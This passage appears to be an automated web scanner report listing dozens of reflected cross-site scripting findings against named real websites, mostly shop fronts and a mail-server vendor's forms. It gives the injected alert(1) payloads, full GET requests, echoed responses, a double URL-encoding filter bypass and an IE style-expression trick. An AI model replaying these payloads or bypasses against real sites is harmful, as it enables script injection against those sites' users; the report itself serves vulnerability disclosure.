The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e85"><script>alert(1)</script>fbac2c01b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a93c"><script>alert(1)</script>9c6c852bf29 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93eb"><script>alert(1)</script>6b83a8f7561 was submitted in the action parameter. This input was echoed as c93eb\"><script>alert(1)</script>6b83a8f7561 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://store.mandriva.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af4a"><script>alert(1)</script>8d27ed95a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1af4a"><script>alert(1)</script>8d27ed95a34=1 HTTP/1.1
Host: store.mandriva.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,26271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a71"><script>alert(1)</script>b9f1f9d6353d18760 was submitted in the action parameter. This input was echoed as 70a71\"><script>alert(1)</script>b9f1f9d6353d18760 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.
3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://store.mandriva.com
Path: /product_info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b33"><script>alert(1)</script>3a01f5b1865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://store.mandriva.com
Path: /product_info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4974"><script>alert(1)</script>0d8cba98511d21e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4974\"><script>alert(1)</script>0d8cba98511d21e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.
The value of the products_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef39"><script>alert(1)</script>4f532f5a012 was submitted in the products_id parameter. This input was echoed as 7ef39\"><script>alert(1)</script>4f532f5a012 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9b123<script>alert(1)</script>57ab9101622 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json?optionalProperties=Channel.url%2CChannel.logoIMG%2CEvent.url&order=startDateTime&batchSize=2&batch=0&callback=jsonp_16787609b123<script>alert(1)</script>57ab9101622 HTTP/1.1
Host: tvgids.upc.nl
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload f5b88<script>alert(1)</script>d45944dbf30 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.allvoip.gr
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 657e2--><script>alert(1)</script>c53ac8578f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html dir="LTR" lang="el"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-7"> <meta name="title" http-e ...[SNIP]... <a href="http://allvoip.gr/products_new.php?657e2--><script>alert(1)</script>c53ac8578f5=1&op=list&action=buy_now&products_id=580&osCsid=nu0foff71uhnmo7bun7b31jg31"> ...[SNIP]...
3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef5b"><script>alert(1)</script>0c5092af384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63ede<script>alert(1)</script>dcf44148064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00e5"><script>alert(1)</script>ee8ef911b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd28"><script>alert(1)</script>3166a746867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56495<script>alert(1)</script>e3a7c8ec4bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34900"><script>alert(1)</script>1964fc5b40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f6ae"><script>alert(1)</script>f51bcf7e764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc71b<script>alert(1)</script>08cfc6baade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ekko.ws
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e3f"><script>alert(1)</script>bc79ec97915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a was submitted in the REST URL parameter 1. This input was echoed as 24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 was submitted in the REST URL parameter 4. This input was echoed as a9976"style="x:expr/**/ession(alert(1))"9fc951766a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870 was submitted in the REST URL parameter 1. This input was echoed as d1586"style="x:expr/**/ession(alert(1))"77ea5a6a870 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a was submitted in the REST URL parameter 2. This input was echoed as 91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9135
Date: Sun, 15 May 2011 13:18:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <title>404 - Page non trouv..e</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> ...[SNIP]... <A href="mailto:Web@grics.qc.ca?subject=Page introuvable&body=Ref.: images/favicon.ico91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a"> ...[SNIP]...
3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.internetnatrgovina.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3f5a6--><script>alert(1)</script>2a5a0ebd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?3f5a6--><script>alert(1)</script>2a5a0ebd0=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.internetnatrgovina.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a3f"><script>alert(1)</script>8266b710003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?21a3f"><script>alert(1)</script>8266b710003=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8e9"><script>alert(1)</script>a551140aa99 was submitted in the Company parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Company VALUE="4b8e9"><script>alert(1)</script>a551140aa99" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c99"><script>alert(1)</script>5f38dc1c19f was submitted in the Email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Email VALUE="f1c99"><script>alert(1)</script>5f38dc1c19f" SIZE=30 MAXLENGTH=100> ...[SNIP]...
The value of the Name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 163d0"><script>alert(1)</script>95fd9f3ee90 was submitted in the Name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Name VALUE="163d0"><script>alert(1)</script>95fd9f3ee90" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df93c"><script>alert(1)</script>1a295be864 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:11 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1747
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Phone VALUE="df93c"><script>alert(1)</script>1a295be864" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfc8"><script>alert(1)</script>c1760f9a5931297f6 was submitted in the Subject parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:16 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1793
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Subject VALUE="3bfc8"><script>alert(1)</script>c1760f9a5931297f6" SIZE=30 MAXLENGTH=50> ...[SNIP]...
The value of the WebPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538a8"><script>alert(1)</script>541646c2d83ed52 was submitted in the WebPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:04:47 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1791
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52"> ...[SNIP]...
The value of the webpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3060"><script>alert(1)</script>b8786e930d9 was submitted in the webpage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:04:40 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1787
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9"> ...[SNIP]...
The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3238"><script>alert(1)</script>590a7eea2a0860cbb was submitted in the Company parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="40" name="Company" value="c3238"><script>alert(1)</script>590a7eea2a0860cbb" ID="Text7"> ...[SNIP]...
The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d3"><script>alert(1)</script>067b77b653664807 was submitted in the Email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:38 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28259
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="100" name="Email" value="d28d3"><script>alert(1)</script>067b77b653664807" ID="Text5"> ...[SNIP]...
The value of the Email2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>c4dc73218bdf8135f was submitted in the Email2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:49 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" autocomplete="off" size="30" maxlength="100" name="Email2" value="5024a"><script>alert(1)</script>c4dc73218bdf8135f" ID="Text6"> ...[SNIP]...
The value of the Ext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62da0"><script>alert(1)</script>8132e80da77b74d5d was submitted in the Ext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:27 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="6" maxlength="6" name="Ext" value="62da0"><script>alert(1)</script>8132e80da77b74d5d" ID="Text4"> ...[SNIP]...
The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e45f"><script>alert(1)</script>002c41aa3e5422ea6 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:07:53 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="15" maxlength="15" name="FirstName" value="7e45f"><script>alert(1)</script>002c41aa3e5422ea6" ID="Text1"> ...[SNIP]...
The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>4004675a7accf1613 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:04 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="25" maxlength="25" name="LastName" value="6bf78"><script>alert(1)</script>4004675a7accf1613" ID="Text2"> ...[SNIP]...
The value of the MailboxQty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad01b"><script>alert(1)</script>f97f00b1bc61e0487 was submitted in the MailboxQty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:44 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="10" maxlength="10" name="MailboxQty" value="ad01b"><script>alert(1)</script>f97f00b1bc61e0487" ID="Text11"> ...[SNIP]...
The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66eec"><script>alert(1)</script>af95af7433ec180f6 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:15 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28236
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="20" maxlength="20" name="Phone" value="66eec"><script>alert(1)</script>af95af7433ec180f6" ID="Text3"> ...[SNIP]...
The value of the SourceDesc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0ec"><script>alert(1)</script>40e439a7c6095ec33 was submitted in the SourceDesc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
